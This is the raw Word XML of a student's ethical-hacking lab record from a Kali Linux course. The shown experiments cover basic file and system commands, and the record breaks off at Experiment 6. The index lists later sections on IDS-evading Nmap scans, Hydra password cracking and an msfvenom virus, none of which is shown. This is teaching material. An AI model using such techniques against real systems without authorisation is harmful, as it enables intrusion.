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6743" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00A04CDF">
      <w:pPr>
        <w:spacing w:after="1400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FC84489" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Ethical Hacking Lab Record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FA3BBF" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00A04CDF">
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD2F184" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ITA1413 — ETHICAL HACKING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19883AC9" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="600"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Laboratory Manual / Record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A43DEBA" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00A04CDF">
      <w:pPr>
        <w:spacing w:after="800"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C457C4" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Submitted by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F67DE02" w14:textId="259BFE06" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Name:  </w:t>
      </w:r>
      <w:r w:rsidR="001A1595">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P. Bharath Reddy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBCCA78" w14:textId="299D22F7" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Register No.: 192</w:t>
      </w:r>
      <w:r w:rsidR="001A1595">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>210180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB02BF9" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00A04CDF">
      <w:pPr>
        <w:spacing w:after="1000"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5093A2C8" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Department of Computer Science (Cyber Security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD8BCC1" w14:textId="7BAE8D3C" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Academic Year 202</w:t>
      </w:r>
      <w:r w:rsidR="001A1595">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>–202</w:t>
      </w:r>
      <w:r w:rsidR="001A1595">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CE19BE" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BE81DD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INDEX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F88CE3A" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00A04CDF">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5C8A32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1. Execution of rm, users, and tree Commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2E7534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2. Execution of less, more, and vi Commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34535250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3. Execution of tree, head, and tail Commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B899BCE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 xml:space="preserve">4. Execution of ls, cat, and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Commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692B1862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5. Execution of uptime, date, and mv Commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35534CD5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 xml:space="preserve">6. Execution of touch, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pwd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wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B74A10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7. Execution of cd, cp, and ls Commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA13AFB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8. Nmap Service Version Detection, Aggressive Scan, and OS Detection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6069A1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9. Nmap Timing: Polite and Normal IDS Evasion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C1130B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10. Execution of free, sort, and history Commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08044067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11. Nmap Timing: Aggressive and Insane Speed Scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262753C3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12. Port Scanning Tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC516FD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13. Host Discovery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0FB5C3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14. Cracking the Password Using Hydra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBCC91C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 xml:space="preserve">15. Information Gathering Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>theHarvester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7C3E1F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16. Use Google and Who.is for Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5867E3FB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 xml:space="preserve">17. Windows OS Commands Execution (traceroute, ping, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, netstat)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A20148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 xml:space="preserve">18. Vulnerabilities Analysis Using CGI Scanning with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7617EC9D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19. Wireshark Sniffer for Network Traffic and Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDD2B7D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20. Implement the Boot Sector Virus Concept (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>msfvenom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</w:rPr>
        <w:tab/>
        <w:t>22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA15FA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21. Batch File Execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8A012C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22. Packet Analyser Tool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5BB74D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23. Port Scanning Tools (Extended)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5893AEEE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24. Nmap Timing and Performance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AAD5E0" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>25. Shell Programming: Square of a Number and Biggest of Three Numbers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DBBE0E" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4116E418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1: Execution of rm, users, and tree Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263951B9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0000FA5B" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To execute and display the results of the rm, users, and tree commands in the Kali Linux operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409127DC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1BB3029C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3D77DA4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Create a sample file using touch testfile.txt and confirm it with ls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FE0487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Remove the file using: rm testfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610078F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users to list the currently logged-in users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2EB33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tree -L 2 to display the directory structure up to two levels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9D2F8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61C0B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340D07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touch testfile.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48E4A2FA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ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="064D3E1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testfile.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C52E592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rm testfile.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="733DF23F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ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A833D6B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users</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07D8065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kali</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0577201B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tree -L 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="461754A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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0817178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 Desktop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78EF85B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 Documents</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17E9A33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 Downloads</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7928020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 Music</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EE36A9E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 Pictures</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="457DE45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 Public</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09AEFA7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├── Templates</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18CB549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└── Videos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B77EE0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2F37AF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 directories, 0 files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39733336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The rm, users, and tree commands were executed successfully; rm deleted the test file, users listed the active session, and tree displayed the home-directory hierarchy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13806C3F" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C56742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2: Execution of less, more, and vi Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7017158E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40A2ECD6" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To execute and display the results of the less, more, and vi commands for viewing and editing text files in Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45649825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3F2DAB71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5616EC62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Create a sample text file: head -20 /etc/services &gt; sample.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48775FB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View the file with less sample.txt and scroll using the arrow keys; quit with q.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A0C455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View the file with more sample.txt and observe the page-by-page --More-- prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0098AF3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the file with vi sample.txt, enter insert mode with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, make an edit, then save and exit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>with :</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C86D5FA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29C64B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BC178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head -20 /etc/services &gt; sample.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32CA0252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less sample.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AC7C295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tcpmux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2C8089D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           7/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5A351AC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           7/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udp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="42503E8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discard         9/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1B7C51E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:(END) -- press q to quit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B6005D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DCC8535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more sample.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A1F3160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tcpmux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09B5F1BE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           7/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2407AC8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--More--(20%)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5572EB8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4C3234A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vi sample.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D2DA80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INSERT --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B93B55D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wq</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0CA179B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"sample.txt" 20L, 340C written</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37390936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The less, more, and vi commands were used to view and edit a text file; the pager-style navigation of less/more and vi's insert-and-save workflow were observed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222322E7" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FEB9EE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3: Execution of tree, head, and tail Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2FBA47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0509EEF8" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To execute and display the results of the tree, head, and tail commands for inspecting directory structures and file contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692143E8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3C3714BE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2823815C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tree /etc/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to view the directory structure of the Nmap configuration folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75267312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head -5 /etc/services to display the first five lines of the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1972C5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tail -5 /etc/services to display the last five lines of the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E54EBD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Compare the line ranges returned by head and tail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE9B0F6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33C915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6BD64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tree /etc/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</w:p>
          <w:p w14:paraId="090C47A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/etc/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</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3725662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-mac-prefixes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30CBBAA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-protocols</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12C4457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nmap-rpc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0EAA24A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-service-probes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="304BD6A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-services</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6876BE4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E6E7C1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0 directories, 5 files</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F9A5C9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FDEBA1D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head -5 /etc/services</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E96B949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tcpmux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574EFBB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      7/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0C1A646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      7/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udp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6B8BB37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discard    9/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6970BE7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discard    9/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udp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="254793CE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5FDFEA2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tail -5 /etc/services</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C1E5A8E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nfsd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2049/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udp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7384BAEC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knetd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2053/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4603D88F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9535/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1C97C449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isdninfo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9538/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0551F24D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mtp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9539/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</w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="445A96B6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The tree, head, and tail commands ran successfully, showing the Nmap configuration directory tree and the first and last five lines of /etc/services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6254A2C0" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F48966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 xml:space="preserve">Experiment 4: Execution of ls, cat, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3747EC3E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5D3EC65C" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To execute and display the results of the ls, cat, and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commands for basic file and directory management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4CAE55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34C8D6D6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17E68F0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lab_files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create a new directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030AF896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Move into it with cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lab_files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, then create a file with cat &gt; notes.txt, type text, and save with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ctrl+D</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EF4691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cat notes.txt to display the file content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34730BBC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ls -l to list the directory contents with permissions and size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C95FAB9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1B411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C0535C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</w:p>
          <w:p w14:paraId="4D4AED8D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cd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</w:p>
          <w:p w14:paraId="4E882119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cat &gt; notes.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="576AA4F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Ethical Hacking Lab - Experiment 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3148166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^D</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3590A332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cat notes.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08D181F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Ethical Hacking Lab - Experiment 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6873C189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ls -l</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BD498A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total 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65F24B5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-r--r-- 1 kali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36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Aug  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11:02 notes.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A8E9B36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A new directory was created and a file was written and displayed using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, cat, and ls, confirming correct file creation and listing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE53478" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="631AAEDE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5: Execution of uptime, date, and mv Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B35B3C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28BFC572" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To execute and display the results of the uptime, date, and mv commands for system status checking and file management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6006662D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708ABC4A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15664AF6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uptime to check system uptime and load average.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10567E63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date to display the current system date and time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613B463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mv notes.txt renamed_notes.txt to rename a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A01E3A1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Confirm the rename with ls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7586790B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7E6CF3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E87DE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uptime</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E0F26A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11:15:02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  2:14,  1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user,  load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average: 0.12, 0.09, 0.05</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="564A36FF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date</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="782CB12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Mon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Aug  3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11:15:07 IST 2026</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6595CB56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mv notes.txt renamed_notes.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EA680E1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ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14AAFB0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renamed_notes.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34C11CFD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The uptime and date commands reported system status and time, and mv successfully renamed the target file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F81E675" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6572FA75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 xml:space="preserve">Experiment 6: Execution of touch, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
